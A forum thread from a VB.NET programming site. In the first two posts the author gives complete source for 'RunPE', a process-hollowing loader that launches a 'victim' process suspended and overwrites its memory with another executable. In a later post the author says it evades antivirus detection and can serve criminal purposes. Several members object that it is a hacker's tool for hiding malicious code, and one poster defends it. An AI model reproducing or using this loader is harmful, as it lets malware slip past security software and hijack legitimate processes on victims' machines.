Results 1 to 27 of 27

Thread: [VB.NET] RunPE

  1. #1

    Thread Starter
    Addicted Member
    Join Date
    Oct 2008
    Posts
    202

    [VB.NET] RunPE

    Code:
    'Made by JapaBrz
    Imports System.Runtime.InteropServices
    Imports System.Text
    
    Class DD
        <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> _
    Structure STARTUPINFO
            Public cb As Integer
            Public lpReserved As String
            Public lpDesktop As String
            Public lpTitle As String
            Public dwX As Integer
            Public dwY As Integer
            Public dwXSize As Integer
            Public dwYSize As Integer
            Public dwXCountChars As Integer
            Public dwYCountChars As Integer
            Public dwFillAttribute As Integer
            Public dwFlags As Integer
            Public wShowWindow As Short
            Public cbReserved2 As Short
            Public lpReserved2 As Integer
            Public hStdInput As Integer
            Public hStdOutput As Integer
            Public hStdError As Integer
        End Structure
        Private Structure PROCESS_INFORMATION
            Public hProcess As IntPtr
            Public hThread As IntPtr
            Public dwProcessId As Integer
            Public dwThreadId As Integer
        End Structure
        <StructLayout(LayoutKind.Sequential)> _
        Private Structure IMAGE_DOS_HEADER
            Public e_magic As UInt16
            ' Magic number
            Public e_cblp As UInt16
            ' Bytes on last page of file
            Public e_cp As UInt16
            ' Pages in file
            Public e_crlc As UInt16
            ' Relocations
            Public e_cparhdr As UInt16
            ' Size of header in paragraphs
            Public e_minalloc As UInt16
            ' Minimum extra paragraphs needed
            Public e_maxalloc As UInt16
            ' Maximum extra paragraphs needed
            Public e_ss As UInt16
            ' Initial (relative) SS value
            Public e_sp As UInt16
            ' Initial SP value
            Public e_csum As UInt16
            ' Checksum
            Public e_ip As UInt16
            ' Initial IP value
            Public e_cs As UInt16
            ' Initial (relative) CS value
            Public e_lfarlc As UInt16
            ' File address of relocation table
            Public e_ovno As UInt16
            ' Overlay number
            <MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> _
            Public e_res1 As UInt16()
            ' Reserved words
            Public e_oemid As UInt16
            ' OEM identifier (for e_oeminfo)
            Public e_oeminfo As UInt16
            ' OEM information; e_oemid specific
            <MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> _
            Public e_res2 As UInt16()
            ' Reserved words
            Public e_lfanew As Int32
            ' File address of new EXE header
        End Structure
        <StructLayout(LayoutKind.Sequential, CharSet:=CharSet.Unicode)> _
        Private Structure VS_VERSIONINFO
            Public wLength As UInt16
            Public wValueLength As UInt16
            Public wType As UInt16
            <MarshalAs(UnmanagedType.ByValTStr, SizeConst:=15)> _
            Public szKey As String
            Public Padding1 As UInt16
        End Structure
        <StructLayout(LayoutKind.Sequential)> _
        Structure SECURITY_ATTRIBUTES
            Public nLength As Integer
            Public lpSecurityDescriptor As IntPtr
            Public bInheritHandle As Integer
        End Structure
        <StructLayout(LayoutKind.Sequential)> _
        Private Structure VS_FIXEDFILEINFO
            Public dwSignature As UInt32
            Public dwStrucVersion As UInt32
            Public dwFileVersionMS As UInt32
            Public dwFileVersionLS As UInt32
            Public dwProductVersionMS As UInt32
            Public dwProductVersionLS As UInt32
            Public dwFileFlagsMask As UInt32
            Public dwFileFlags As UInt32
            Public dwFileOS As UInt32
            Public dwFileType As UInt32
            Public dwFileSubtype As UInt32
            Public dwFileDateMS As UInt32
            Public dwFileDateLS As UInt32
        End Structure
        <StructLayout(LayoutKind.Sequential)> _
        Public Structure FLOATING_SAVE_AREA
    
    
            Public ControlWord As UInteger
            Public StatusWord As UInteger
            Public TagWord As UInteger
            Public ErrorOffset As UInteger
            Public ErrorSelector As UInteger
            Public DataOffset As UInteger
            Public DataSelector As UInteger
            <MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> _
            Public RegisterArea As Byte()
            Public Cr0NpxState As UInteger
    
        End Structure
        <StructLayout(LayoutKind.Sequential)> _
        Public Structure CONTEXT
    
    
            Public ContextFlags As UInteger
            'set this to an appropriate value
            ' Retrieved by CONTEXT_DEBUG_REGISTERS
            Public Dr0 As UInteger
            Public Dr1 As UInteger
            Public Dr2 As UInteger
            Public Dr3 As UInteger
            Public Dr6 As UInteger
            Public Dr7 As UInteger
            ' Retrieved by CONTEXT_FLOATING_POINT
            Public FloatSave As FLOATING_SAVE_AREA
            ' Retrieved by CONTEXT_SEGMENTS
            Public SegGs As UInteger
            Public SegFs As UInteger
            Public SegEs As UInteger
            Public SegDs As UInteger
            ' Retrieved by CONTEXT_INTEGER
            Public Edi As UInteger
            Public Esi As UInteger
            Public Ebx As UInteger
            Public Edx As UInteger
            Public Ecx As UInteger
            Public Eax As UInteger
            ' Retrieved by CONTEXT_CONTROL
            Public Ebp As UInteger
            Public Eip As UInteger
            Public SegCs As UInteger
            Public EFlags As UInteger
            Public Esp As UInteger
            Public SegSs As UInteger
            ' Retrieved by CONTEXT_EXTENDED_REGISTERS
            <MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> _
            Public ExtendedRegisters As Byte()
    
        End Structure
        <StructLayout(LayoutKind.Sequential)> _
      Public Structure IMAGE_OPTIONAL_HEADER32
            '
            ' Standard fields.
            '
            Public Magic As UInt16
            Public MajorLinkerVersion As [Byte]
            Public MinorLinkerVersion As [Byte]
            Public SizeOfCode As UInt32
            Public SizeOfInitializedData As UInt32
            Public SizeOfUninitializedData As UInt32
            Public AddressOfEntryPoint As UInt32
            Public BaseOfCode As UInt32
            Public BaseOfData As UInt32
            '
            ' NT additional fields.
            '
            Public ImageBase As UInt32
            Public SectionAlignment As UInt32
            Public FileAlignment As UInt32
            Public MajorOperatingSystemVersion As UInt16
            Public MinorOperatingSystemVersion As UInt16
            Public MajorImageVersion As UInt16
            Public MinorImageVersion As UInt16
            Public MajorSubsystemVersion As UInt16
            Public MinorSubsystemVersion As UInt16
            Public Win32VersionValue As UInt32
            Public SizeOfImage As UInt32
            Public SizeOfHeaders As UInt32
            Public CheckSum As UInt32
            Public Subsystem As UInt16
            Public DllCharacteristics As UInt16
            Public SizeOfStackReserve As UInt32
            Public SizeOfStackCommit As UInt32
            Public SizeOfHeapReserve As UInt32
            Public SizeOfHeapCommit As UInt32
            Public LoaderFlags As UInt32
            Public NumberOfRvaAndSizes As UInt32
            <MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> _
            Public DataDirectory As IMAGE_DATA_DIRECTORY()
        End Structure
        <StructLayout(LayoutKind.Sequential)> _
    Public Structure IMAGE_FILE_HEADER
            Public Machine As UInt16
            Public NumberOfSections As UInt16
            Public TimeDateStamp As UInt32
            Public PointerToSymbolTable As UInt32
            Public NumberOfSymbols As UInt32
            Public SizeOfOptionalHeader As UInt16
            Public Characteristics As UInt16
        End Structure
        <StructLayout(LayoutKind.Sequential)> _
    Public Structure IMAGE_DATA_DIRECTORY
            Public VirtualAddress As UInt32
            Public Size As UInt32
        End Structure
        Public Structure IMAGE_NT_HEADERS
            Public Signature As UInt32
            Public FileHeader As IMAGE_FILE_HEADER
            Public OptionalHeader As IMAGE_OPTIONAL_HEADER32
        End Structure
        Public Enum IMAGE_SIZEOF_SHORT_NAME
            IMAGE_SIZEOF_SHORT_NAME = 8
        End Enum
        Public Structure Misc
            Public PhysicalAddress As System.UInt32
            Public VirtualSize As System.UInt32
        End Structure
        Public Structure IMAGE_SECTION_HEADER
            Public Name As System.Byte
            Public Misc As Misc
            Public VirtualAddress As System.UInt32
            Public SizeOfRawData As System.UInt32
            Public PointerToRawData As System.UInt32
            Public PointerToRelocations As System.UInt32
            Public PointerToLinenumbers As System.UInt32
            Public NumberOfRelocations As System.UInt16
            Public NumberOfLinenumbers As System.UInt16
            Public Characteristics As System.UInt32
        End Structure
    
        Public Const CONTEXT_X86 = &H10000
        Public Const CONTEXT86_CONTROL = (CONTEXT_X86 Or &H1)          'SS:SP, CS:IP, FLAGS, BP
        Public Const CONTEXT86_INTEGER = (CONTEXT_X86 Or &H2)          'AX, BX, CX, DX, SI, DI
        Public Const CONTEXT86_SEGMENTS = (CONTEXT_X86 Or &H4)         'DS, ES, FS, GS
        Public Const CONTEXT86_FLOATING_POINT = (CONTEXT_X86 Or &H8)   '387 state
        Public Const CONTEXT86_DEBUG_REGISTERS = (CONTEXT_X86 Or &H10) 'DB 0-3,6,7
        Public Const CONTEXT86_FULL = (CONTEXT86_CONTROL Or CONTEXT86_INTEGER Or CONTEXT86_SEGMENTS)
        Public Const CREATE_SUSPENDED = &H4
        Public Const MEM_COMMIT As Long = &H1000&
        Public Const MEM_RESERVE As Long = &H2000&
        Public Const PAGE_NOCACHE As Long = &H200
        Public Const PAGE_EXECUTE_READWRITE As Long = &H40
        Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80
        Public Const PAGE_EXECUTE_READ As Long = &H20
        Public Const PAGE_EXECUTE As Long = &H10
        Public Const PAGE_WRITECOPY As Long = &H8
        Public Const PAGE_NOACCESS As Long = &H1
        Public Const PAGE_READWRITE As Long = &H4

  2. #2

    Thread Starter
    Addicted Member
    Join Date
    Oct 2008
    Posts
    202

    Re: [VB.NET] RunPE

    Code:
        <DllImport("kernel32.dll")> _
        Private Shared Function ResumeThread(ByVal hThread As IntPtr) As UInt32
        End Function
        <DllImport("kernel32.dll")> _
        Private Shared Function GetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean
        End Function
        <DllImport("kernel32.dll")> _
        Private Shared Function SetThreadContext(ByVal hThread As IntPtr, ByRef lpContext As CONTEXT) As Boolean
        End Function
    
        <DllImport("kernel32.dll")> _
        Private Shared Function LoadLibraryA(ByVal lpLibFileName As String) As Integer
        End Function
        <DllImport("kernel32.dll")> _
        Private Shared Function CreateProcess(ByVal lpApplicationName As String, _
        ByVal lpCommandLine As String, ByRef lpProcessAttributes As SECURITY_ATTRIBUTES, _
         ByRef lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Boolean, _
        ByVal dwCreationFlags As UInt32, ByVal lpEnvironment As IntPtr, ByVal lpCurrentDirectory As String, _
       <[In]()> ByRef lpStartupInfo As STARTUPINFO, _
       <[Out]()> ByRef lpProcessInformation As PROCESS_INFORMATION) As Boolean
        End Function
    
        <DllImport("kernel32.dll", _
        SetLastError:=True, _
        CharSet:=CharSet.Auto, _
        EntryPoint:="WriteProcessMemory", _
        CallingConvention:=CallingConvention.StdCall)> _
     Shared Function WriteProcessMemory( _
     ByVal hProcess As IntPtr, _
     ByVal lpBaseAddress As IntPtr, _
     ByVal lpBuffer As Byte(), _
     ByVal iSize As Int32, _
     <Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean
        End Function
        <DllImport("kernel32.dll", _
    SetLastError:=True, _
    CharSet:=CharSet.Auto, _
    EntryPoint:="WriteProcessMemory", _
    CallingConvention:=CallingConvention.StdCall)> _
    Shared Function WriteProcessMemoryI( _
    ByVal hProcess As IntPtr, _
    ByVal lpBaseAddress As IntPtr, _
    ByVal lpBuffer As IntPtr, _
    ByVal iSize As Int32, _
    <Out()> ByRef lpNumberOfBytesWritten As Int32) As Boolean
        End Function
        <DllImport("kernel32.dll", EntryPoint:="ReadProcessMemory")> _
        Public Shared Function ReadProcessMemory(ByVal hProcess As IntPtr, _
        ByVal lpBaseAddress As Integer, _
        ByRef lpbuffer As IntPtr, _
        ByVal size As Integer, _
        ByRef lpNumberOfBytesRead As Integer) As Int32
        End Function
        <DllImport("ntdll.dll")> _
        Public Shared Function ZwUnmapViewOfSection(ByVal hProcess As IntPtr, ByVal BaseAddress As IntPtr) As Long
        End Function
    
        <DllImport("kernel32.dll", SetLastError:=True, ExactSpelling:=True)> _
        Public Shared Function VirtualAllocEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, _
        ByVal dwSize As UInteger, ByVal flAllocationType As UInteger, _
        ByVal flProtect As UInteger) As IntPtr
        End Function
        <DllImport("kernel32", CharSet:=CharSet.Auto, SetLastError:=True)> _
        Public Shared Function VirtualProtectEx(ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As UIntPtr, ByVal flNewProtect As UIntPtr, <Out()> ByVal lpflOldProtect As UInteger) As Integer
        End Function
    
        Const GENERIC_READ As Int32 = &H80000000
        Const FILE_SHARE_READ As UInt32 = &H1
        Const OPEN_EXISTING As UInt32 = 3
        Const FILE_ATTRIBUTE_NORMAL As UInt32 = &H80
        Const INVALID_HANDLE_VALUE As Int32 = -1
        Const PAGE_READONLY As UInt32 = &H2
        Const FILE_MAP_READ As UInt32 = &H4
        Const IMAGE_DOS_SIGNATURE As UInt16 = &H5A4D
        Const RT_VERSION As Int32 = 16
    
        Private Enum ImageSignatureTypes
            IMAGE_DOS_SIGNATURE = &H5A4D     ''\\ MZ
            IMAGE_OS2_SIGNATURE = &H454E     ''\\ NE
            IMAGE_OS2_SIGNATURE_LE = &H454C  ''\\ LE
            IMAGE_VXD_SIGNATURE = &H454C     ''\\ LE
            IMAGE_NT_SIGNATURE = &H4550      ''\\ PE00
        End Enum
    
        Public Shared Sub SRexec(ByVal b() As Byte, ByVal sVictim As String)
            Dim sVersion As [String] = Nothing
            Dim pidh As IMAGE_DOS_HEADER
            Dim context As CONTEXT = New CONTEXT()
    
            Dim Pinh As IMAGE_NT_HEADERS
            Dim Pish As IMAGE_SECTION_HEADER
    
            Dim pi As PROCESS_INFORMATION = New PROCESS_INFORMATION()
            Dim si As STARTUPINFO = New STARTUPINFO()
    
            Dim pSec As SECURITY_ATTRIBUTES = New SECURITY_ATTRIBUTES()
            Dim tSec As SECURITY_ATTRIBUTES = New SECURITY_ATTRIBUTES()
    
    		'converts a data type in another type.
    		'since .net types are different from types handle by winAPI,  DirectCall a API will cause a type mismatch, since .net types
    		' structure is completely different, using different resources.
            Dim MyGC As GCHandle = GCHandle.Alloc(b, GCHandleType.Pinned)
            Dim ptbuffer As Integer = MyGC.AddrOfPinnedObject.ToInt32
            pidh = Marshal.PtrToStructure(MyGC.AddrOfPinnedObject, pidh.GetType)
            MyGC.Free()
    
            If CreateProcess(Nothing, sVictim, pSec, tSec, False, &H4, Nothing, Nothing, si, pi) = 0 Then
                Exit Sub
            End If
    
            Dim vt As Integer = ptbuffer + pidh.e_lfanew
            Pinh = Marshal.PtrToStructure(New IntPtr(vt), Pinh.GetType)
    
            Dim addr As Long, lOffset As Long, ret As UInteger
            si.cb = Len(si)
            context.ContextFlags = CONTEXT86_INTEGER
    		
    		'all "IF" are only for better understanding, you could do all verification on the builder and then the rest on the stub
            If Pinh.Signature <> ImageSignatureTypes.IMAGE_NT_SIGNATURE Or pidh.e_magic <> ImageSignatureTypes.IMAGE_DOS_SIGNATURE Then Exit Sub
            If GetThreadContext(pi.hThread, context) And _
                ReadProcessMemory(pi.hProcess, context.Ebx + 8, addr, 4, 0) >= 0 And _
                ZwUnmapViewOfSection(pi.hProcess, addr) >= 0 Then
    
                Dim ImageBase As UInt32 = VirtualAllocEx(pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
                If ImageBase <> 0 Then
                    WriteProcessMemory(pi.hProcess, ImageBase, b, Pinh.OptionalHeader.SizeOfHeaders, ret)
    
                    lOffset = pidh.e_lfanew + 248
                    For i As Integer = 0 To Pinh.FileHeader.NumberOfSections - 1
    				'math changes, anyone with pe understanding know
                        Pish = Marshal.PtrToStructure(New IntPtr(ptbuffer + lOffset + i * 40), Pish.GetType)
                        Dim braw(Pish.SizeOfRawData) As Byte
    					'more math for reading only the section.  mm API has a "shortcut" when you pass a specified startpoint.
    					'.net can't use so you have to make a new array
                        For j As Integer = 0 To Pish.SizeOfRawData - 1
                            braw(j) = b(Pish.PointerToRawData + j)
                        Next
                        WriteProcessMemory(pi.hProcess, ImageBase + Pish.VirtualAddress, braw, Pish.SizeOfRawData, ret)
                        VirtualProtectEx(pi.hProcess, ImageBase + Pish.VirtualAddress, Pish.Misc.VirtualSize, Protect(Pish.Characteristics), addr)
                    Next i
                    Dim bb As Byte() = BitConverter.GetBytes(ImageBase)
    
                    WriteProcessMemory(pi.hProcess, context.Ebx + 8, bb, 4, ret)
                    context.Eax = ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
                    Call SetThreadContext(pi.hThread, context)
                    Call ResumeThread(pi.hThread)
                End If
            End If
        End Sub
    
        Private Shared Function Protect(ByVal characteristics As Long) As Long
            Dim mapping() As Object = {PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _
                            PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _
                            PAGE_READWRITE, PAGE_EXECUTE_READWRITE}
    
            Protect = mapping(RShift(characteristics, 29))
        End Function
    	
        Private Shared Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long
            RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift)
        End Function
        Private Shared Function vbLongToULong(ByVal Value As Long) As Double
            Const OFFSET_4 = 4294967296.0#
            If Value < 0 Then
                vbLongToULong = Value + OFFSET_4
            Else
                vbLongToULong = Value
            End If
        End Function
    	
    End Class
    Made by JapaBrz


    Works somehow only under XP. Has i think something to do with the API Calls.
    Last edited by alexjanjic; Jan 21st, 2010 at 01:16 PM.

  3. #3
    Smooth Moperator techgnome's Avatar
    Join Date
    May 2002
    Posts
    34,522

    Re: [VB.NET] RunPE

    Uh-huh... okaaay... so???? What does it do? How do you use it?

    -tg
    * I don't respond to private (PM) requests for help. It's not conducive to the general learning of others.*
    * I also don't respond to friend requests. Save a few bits and don't bother. I'll just end up rejecting anyways.*
    * How to get EFFECTIVE help: The Hitchhiker's Guide to Getting Help at VBF - Removing eels from your hovercraft *
    * How to Use Parameters * Create Disconnected ADO Recordset Clones * Set your VB6 ActiveX Compatibility * Get rid of those pesky VB Line Numbers * I swear I saved my data, where'd it run off to??? *

  4. #4
    Wait... what? weirddemon's Avatar
    Join Date
    Jan 2009
    Location
    USA
    Posts
    3,828

    Re: [VB.NET] RunPE

    Is that the same as this and this?
    CodeBank contributions: Process Manager, Temp File Cleaner

    Quote Originally Posted by SJWhiteley
    "game trainer" is the same as calling the act of robbing a bank "wealth redistribution"....

  5. #5
    Smooth Moperator techgnome's Avatar
    Join Date
    May 2002
    Posts
    34,522

    Re: [VB.NET] RunPE

    I dunno... but anything that has "NOT TO USE FOR CRIMINAL STUFF" as a disclaimer sure seems dubious to me.

    -tg
    * I don't respond to private (PM) requests for help. It's not conducive to the general learning of others.*
    * I also don't respond to friend requests. Save a few bits and don't bother. I'll just end up rejecting anyways.*
    * How to get EFFECTIVE help: The Hitchhiker's Guide to Getting Help at VBF - Removing eels from your hovercraft *
    * How to Use Parameters * Create Disconnected ADO Recordset Clones * Set your VB6 ActiveX Compatibility * Get rid of those pesky VB Line Numbers * I swear I saved my data, where'd it run off to??? *

  6. #6

    Thread Starter
    Addicted Member
    Join Date
    Oct 2008
    Posts
    202

    Re: [VB.NET] RunPE

    Quote Originally Posted by weirddemon View Post
    Is that the same as this and this?
    Yes but for .Net thats VB6.

  7. #7
    Wait... what? weirddemon's Avatar
    Join Date
    Jan 2009
    Location
    USA
    Posts
    3,828

    Re: [VB.NET] RunPE

    Quote Originally Posted by techgnome View Post
    I dunno... but anything that has "NOT TO USE FOR CRIMINAL STUFF" as a disclaimer sure seems dubious to me.

    -tg
    Agreed.

    Is it safe to say no one knows what this does?
    CodeBank contributions: Process Manager, Temp File Cleaner

    Quote Originally Posted by SJWhiteley
    "game trainer" is the same as calling the act of robbing a bank "wealth redistribution"....

  8. #8
    Wait... what? weirddemon's Avatar
    Join Date
    Jan 2009
    Location
    USA
    Posts
    3,828

    Re: [VB.NET] RunPE

    I scanned over the code real quick and it looks like this is an example on how to edit memory... I think...
    CodeBank contributions: Process Manager, Temp File Cleaner

    Quote Originally Posted by SJWhiteley
    "game trainer" is the same as calling the act of robbing a bank "wealth redistribution"....

  9. #9

    Thread Starter
    Addicted Member
    Join Date
    Oct 2008
    Posts
    202

    Re: [VB.NET] RunPE

    This is a PE Loader you can run your EXE into Memory without actually having to double click the executeable.

  10. #10
    Pro Grammar chris128's Avatar
    Join Date
    Jun 2007
    Location
    England
    Posts
    7,604

    Re: [VB.NET] RunPE

    Whats wrong with Process.Start()
    My free .NET Windows API library (Version 2.2 Released 12/06/2011)

    Blog: cjwdev.wordpress.com
    Web: www.cjwdev.co.uk


  11. #11

    Thread Starter
    Addicted Member
    Join Date
    Oct 2008
    Posts
    202

    Re: [VB.NET] RunPE

    Quote Originally Posted by chris128 View Post
    Whats wrong with Process.Start()
    Process.Start() makes a Process start normally like a double Click but like this you can load the Process from your Resources and write the PE in to Memory by creating a Process with the CREATE_SUSPENDED flag and writing the PE from the Resources in to Process this avoids lets say AV detection because it isnt run normally thats why it can also be used for Criminal stuff but only smart people could do that i bet 80% of the Forum doesent even know how to use this Code.

  12. #12
    Pro Grammar chris128's Avatar
    Join Date
    Jun 2007
    Location
    England
    Posts
    7,604

    Re: [VB.NET] RunPE

    so what is the "non criminal" use for this? Also, if its that easy to get a program running without an AV detecting it then surely pretty much all viruses would just do that and none would ever be detected..
    My free .NET Windows API library (Version 2.2 Released 12/06/2011)

    Blog: cjwdev.wordpress.com
    Web: www.cjwdev.co.uk


  13. #13
    New Member
    Join Date
    Jun 2010
    Posts
    5

    Re: [VB.NET] RunPE

    Quote Originally Posted by chris128 View Post
    so what is the "non criminal" use for this? Also, if its that easy to get a program running without an AV detecting it then surely pretty much all viruses would just do that and none would ever be detected..

    the "non criminal" use could be for example, in a "life-cd" like application, where you dont want to touch the harddisk. There are much more examples but i dont have enought time to write them all.

    And yes, it is already the case that almost all modern malwares use this technique. In the past, (5-6 years ago) using this method, malwares were much more undetected. Today, almost all Anti-Malware Softwares have developed heuristic analysing methods for detecting suspicious behaviours like the api calls used in the code posted above.
    These heuristic scans (refered to as runtime scans in the hackerscene) also result often in false positives.

  14. #14
    Stack Overflow mod​erator
    Join Date
    May 2008
    Location
    British Columbia, Canada
    Posts
    2,824

    Re: [VB.NET] RunPE

    the "non criminal" use could be for example, in a "life-cd" like application
    Well, VB.NET isn't really bootable (and this code only runs under XP), and running in memory doesn't stop you from touching the harddisk (why not just run it from the CD?)...

  15. #15
    New Member
    Join Date
    Jun 2010
    Posts
    5

    Re: [VB.NET] RunPE

    Quote Originally Posted by minitech View Post
    Well, VB.NET isn't really bootable (and this code only runs under XP), and running in memory doesn't stop you from touching the harddisk (why not just run it from the CD?)...
    this code does run under windows vista and 7, 32 bit as well as 64 bit too. (as far as i know on all windows nt's, so it would work in Win98 )
    And yes, it Does prevent from touching the harddisk! Why is that still unclear to you?
    To your question, why not to run it from cd then... There are still some cd drives which can only read but not write and imagine now on such a pc, hmm let me think, we want to recover some deleted files!

    The program we wrote for recovering files, has intern another program (a special algorithm application which calculates us some results, and we use these result for recovering files.. (and imagine, we dont have the sources of this file, so we cant integrate this algoritm in a normal way in our project, and imagine again, this winPE Is allowed to be used in projects without any licence problems or whatever....)).You could now say, why not 2 files on the cd from the beginning on.. well isnt it better, and more portable, in only one exe. Is the example now ok?

    But as i said, this method can be used to make applications just more undetected by antivirus softwares, so if you have an application, which is detected by AV's just because you do import some win-api methods/dlls, you could want to avoid those false positives. Now you could again say, why dont you just add your exe into the whilelist of AV's... well i share my tools and help with my tools many friends, and it annoys them too, how their AV works. Now nothing was criminal here, and its just another example.

    Well, another big benifit of this method is, that everything happens in Ram much! faster...eeehm.. ok enought examples... You should have already understood that this method gives a coder just more flexibility while developing in windows environments...

    Please dont let me question your creativity next time.

  16. #16
    Pro Grammar chris128's Avatar
    Join Date
    Jun 2007
    Location
    England
    Posts
    7,604

    Re: [VB.NET] RunPE

    Yeah to be honest I'm surprised this thread hasnt been removed...
    My free .NET Windows API library (Version 2.2 Released 12/06/2011)

    Blog: cjwdev.wordpress.com
    Web: www.cjwdev.co.uk


  17. #17
    Stack Overflow mod​erator
    Join Date
    May 2008
    Location
    British Columbia, Canada
    Posts
    2,824

    Re: [VB.NET] RunPE

    Um, running from memory won't stop the program from reading/writing files (how do you think Knoppix works?) and when running an EXE from CD, you can use a MemoryStream to save files. Don't let me question your creativity next time.

  18. #18
    PowerPoster JuggaloBrotha's Avatar
    Join Date
    Sep 2005
    Location
    Lansing, MI; USA
    Posts
    4,286

    Re: [VB.NET] RunPE

    Quote Originally Posted by Aksak View Post
    this code does run under windows vista and 7, 32 bit as well as 64 bit too. (as far as i know on all windows nt's, so it would work in Win98 )
    Just to clarify something for you: Win95, Win98, Win98SE and WinME are not NT based.

    However: WinNT, WinNT2, WinNT3, WinNT4, Win2k, WinXP, Server2003, Vista, Server 2008, Win7, Server 2008 RC2 are all NT based.
    Quote Originally Posted by chris128 View Post
    Yeah to be honest I'm surprised this thread hasnt been removed...
    Me too...
    Currently using VS 2015 Enterprise on Win10 Enterprise x64.

    CodeBank: All Threads • Colors ComboBox • Fading & Gradient Form • MoveItemListBox/MoveItemListView • MultilineListBox • MenuButton • ToolStripCheckBox • Start with Windows

  19. #19
    New Member
    Join Date
    Jun 2010
    Posts
    5

    Re: [VB.NET] RunPE

    Quote Originally Posted by minitech View Post
    Um, running from memory won't stop the program from reading/writing files (how do you think Knoppix works?) and when running an EXE from CD, you can use a MemoryStream to save files. Don't let me question your creativity next time.
    Ehm what do you mean by that? It is really not logical what you say: " running from memory won't stop the program from reading/writing files" ??? running from memory DOES stop a programm from reading/wrting files!

    @ "and when running an EXE from CD, you can use a MemoryStream to save files."
    and why would i want to save files??? what are you talking about?

    @ "how do you think Knoppix works?"
    i think it uses a virtual ram device, but if it doesnt, it doesnt matter because that isnt the topic now, ho knoppix works

    @chris128 and JuggaloBrotha
    why remove the thread?? its useful source!

    @JuggaloBrotha
    sure i know that, i wanted to write "wouldnt", therefor i explicitely mention win98.. i did edit infact this already but forum didnt update it whyever..

  20. #20
    Smooth Moperator techgnome's Avatar
    Join Date
    May 2002
    Posts
    34,522

    Re: [VB.NET] RunPE

    I know precisely why it hasn't been closed... needless to say, it's something out of the hands of us mere mortals.

    Aksak - just because an app loads all of it's DLLs into memory does not mean that the app won't or cant' write to the HD... it still very much can. it just doesn't HAVE to, to get to the loaded resources.

    Additionally, YOU may find the code useful, but a lot of us find it offensive, objectionable, and unethical. It can be used to load a dll into memory and INJECT IT into another process. And I don't mean my own process, but the process of another app... giving me the ability to hijack it. THAT is what the posters here are objecting to. We've spent a LOT of years keeping nefarious code and discussions out of here. This isn't a hackers forum, this is a professional developers forum. Armed with the AUP, we've done a pretty good job at self-policing these kinds of threads and stopping them before they take off and do harm (which has been know to happen... those who have been here long enough will remember the snake incident - which is why no one will just download things from here anymore, at least not with out being able to look at the source code).

    "this method can be used to make applications just more undetected by antivirus softwares" And THAT right there is reason enough (for me at any rate) to be very very very nervous. Doesn't matter if an app triggers a false positive... it's going to allow some one to run code, hidden from me... and my system. I don't like that. And neither should you. It can be used to intentionally hide malicious code from the AV that's supposed to be protecting you.

    Yes, I understand that I used "can" and "could" a lot. And yes, there is a lot of code on this site that is freely available already that could be used badly... like writing to a file... some one could easily take some simple code and just start writing a stream to the HD until it fills and potentially crashes the system. The difference is that there isn't anything inherently wrong with writing to a file. It's something most (if not all of us) do almost daily. It's a common practice. DLL Injection on the other hand, is NOT a common process, and is generally NOT a useful thing to do. Most people who are looking to do injections have a less than respectable intent. They are looking to either do harm to the system, the application or to modify the way something is working. It's a hackers tool. There was a time when we didn't tolerate that around here. Unfortunately times are changing.

    -tg
    * I don't respond to private (PM) requests for help. It's not conducive to the general learning of others.*
    * I also don't respond to friend requests. Save a few bits and don't bother. I'll just end up rejecting anyways.*
    * How to get EFFECTIVE help: The Hitchhiker's Guide to Getting Help at VBF - Removing eels from your hovercraft *
    * How to Use Parameters * Create Disconnected ADO Recordset Clones * Set your VB6 ActiveX Compatibility * Get rid of those pesky VB Line Numbers * I swear I saved my data, where'd it run off to??? *

  21. #21
    New Member
    Join Date
    Jun 2010
    Posts
    5

    Re: [VB.NET] RunPE

    In my definition, a developers forum, on which "non-common" code isnt respected, isnt a professional developers forum. Uncommon codesnippets give coders new perspectives and opportunities. As you said yourself, every knowledge can be used for bad purpoeses. But well, you are right, this code here is more dangerous then others Therefore i would call this forum rather a censoring forum and im against this typ of censorship (when knowledge itself doesnt harm one more than it helps one, but it CAN be used harmfully, even it can be used 99% of the time only for harmfull things and 1% for good things, because, this is the decision problem of the one, who uses this information and not ours.)

    But i still understand that you want to censor this information with best intentions..

  22. #22
    Smooth Moperator techgnome's Avatar
    Join Date
    May 2002
    Posts
    34,522

    Re: [VB.NET] RunPE

    Well, fortunately for you, the powers that be agree. Doesn't mean I have to. It also means I have the right to walk away and not be a party to this.

    So long, farewell, and thanks for the fish.

    -tg
    * I don't respond to private (PM) requests for help. It's not conducive to the general learning of others.*
    * I also don't respond to friend requests. Save a few bits and don't bother. I'll just end up rejecting anyways.*
    * How to get EFFECTIVE help: The Hitchhiker's Guide to Getting Help at VBF - Removing eels from your hovercraft *
    * How to Use Parameters * Create Disconnected ADO Recordset Clones * Set your VB6 ActiveX Compatibility * Get rid of those pesky VB Line Numbers * I swear I saved my data, where'd it run off to??? *

  23. #23
    Pro Grammar chris128's Avatar
    Join Date
    Jun 2007
    Location
    England
    Posts
    7,604

    Re: [VB.NET] RunPE

    I want my fish back

    PS I love that one of the variables in this code is labelled "sVictim" - not for anything malicious you say?...
    Last edited by chris128; Jun 9th, 2010 at 05:28 PM.
    My free .NET Windows API library (Version 2.2 Released 12/06/2011)

    Blog: cjwdev.wordpress.com
    Web: www.cjwdev.co.uk


  24. #24
    Stack Overflow mod​erator
    Join Date
    May 2008
    Location
    British Columbia, Canada
    Posts
    2,824

    Re: [VB.NET] RunPE

    Ehm what do you mean by that? It is really not logical what you say: " running from memory won't stop the program from reading/writing files" ??? running from memory DOES stop a programm from reading/wrting files!

